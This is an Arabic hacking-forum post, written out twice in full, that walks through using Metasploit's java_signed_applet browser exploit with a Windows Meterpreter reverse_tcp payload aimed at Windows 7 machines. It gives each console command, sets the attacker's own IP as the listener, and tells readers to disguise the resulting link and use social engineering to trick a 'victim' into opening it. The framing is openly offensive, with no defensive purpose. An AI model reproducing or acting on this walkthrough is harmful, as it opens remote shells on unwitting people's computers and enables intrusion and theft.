rss
07-09-2012, 03:50 PM
http://islam.makcdn.com/image4714_500_361/500X361.jpg
اليوم راح أشرح إستغلال ثغرة java_signed_applet
الثغرة أقل مأقول عنها جيد حسب تجربتي الشخصية لها
وهي فعالة في إختراق وندوز سفن
نبدء الإستغلال
1| نفتح الميتا بالأمر
msfconsole
2| تمام تم فتح الميتا نضع كود الإستغلال تابع
use exploit/multi/browser/java_signed_applet
3| نختار بايلود المناسب أنا راح أختار بيلود meterpreter
set payload windows/meterpreter/reverse_tcp
4| نكمل بقية الإستغلال ضع نفس الأوامر من أجل تجنب الأخطاء تابع
set uripath dev-point
مكان dev-point ضع أي شئ جداب من أجل التمويه فقط لا غير
5| ضع نفس الأمر لاتغير شئ واضح وضوح الشمس
set srvport 8080
6| ضع إبي حقك بدل الإبي الموجود في الأمر
set SRVHOST 197.207.36.8
امر إستخراج الإبي للمبتدئين
ifconfig
7| أمر إدراج بورت التبليغ إنت ضع أي بورت مفتوح عندك
set lport 443
8| أمر إضافة إلى أين سيصل التبليغ يمكنك وضع النوإبي حقك لا كن الأحسن ضع إبي
set lhost 197.207.36.8
9| أخر شئ أمر تشغيل الثغرة
exploit
الأن اعطي ربط الناتج لضحية ومبروك عليك الإختراق
راح يكون الربط الناتج مثل دا
http://197.207.36.8:8080/dev-point
تنويه
إدا لم يصلك التبليغ بعد إعطائك الربط لضحية لا تجي تقلي الثغر فاشل
لأنه عند إعطائك ربط يلزمك تستعمل تمويه لربط و أيضا تستعمل مع الضحية الهندسة الإجتماعية من
أجل خداعه لكي يقوم بفتح الربط
أرجوا أن يكون كلامي واضح
إدا أعجبك الموضوع لا تحرمنا من تقييمك وكلمتك الطيب
الإهدائات
|
|
|
|
^^
لك أنت
http://www.adel.ws/blog/wp-content/uploads/2008/08/cardramdan.jpg
اليوم راح أشرح إستغلال ثغرة java_signed_applet
الثغرة أقل مأقول عنها جيد حسب تجربتي الشخصية لها
وهي فعالة في إختراق وندوز سفن
نبدء الإستغلال
1| نفتح الميتا بالأمر
msfconsole
2| تمام تم فتح الميتا نضع كود الإستغلال تابع
use exploit/multi/browser/java_signed_applet
3| نختار بايلود المناسب أنا راح أختار بيلود meterpreter
set payload windows/meterpreter/reverse_tcp
4| نكمل بقية الإستغلال ضع نفس الأوامر من أجل تجنب الأخطاء تابع
set uripath dev-point
مكان dev-point ضع أي شئ جداب من أجل التمويه فقط لا غير
5| ضع نفس الأمر لاتغير شئ واضح وضوح الشمس
set srvport 8080
6| ضع إبي حقك بدل الإبي الموجود في الأمر
set SRVHOST 197.207.36.8
امر إستخراج الإبي للمبتدئين
ifconfig
7| أمر إدراج بورت التبليغ إنت ضع أي بورت مفتوح عندك
set lport 443
8| أمر إضافة إلى أين سيصل التبليغ يمكنك وضع النوإبي حقك لا كن الأحسن ضع إبي
set lhost 197.207.36.8
9| أخر شئ أمر تشغيل الثغرة
exploit
الأن اعطي ربط الناتج لضحية ومبروك عليك الإختراق
راح يكون الربط الناتج مثل دا
http://197.207.36.8:8080/dev-point
تنويه
إدا لم يصلك التبليغ بعد إعطائك الربط لضحية لا تجي تقلي الثغر فاشل
لأنه عند إعطائك ربط يلزمك تستعمل تمويه لربط و أيضا تستعمل مع الضحية الهندسة الإجتماعية من
أجل خداعه لكي يقوم بفتح الربط
أرجوا أن يكون كلامي واضح
إدا أعجبك الموضوع لا تحرمنا من تقييمك وكلمتك الطيب
الإهدائات
|
|
|
|
^^
لك أنت
http://www.adel.ws/blog/wp-content/uploads/2008/08/cardramdan.jpg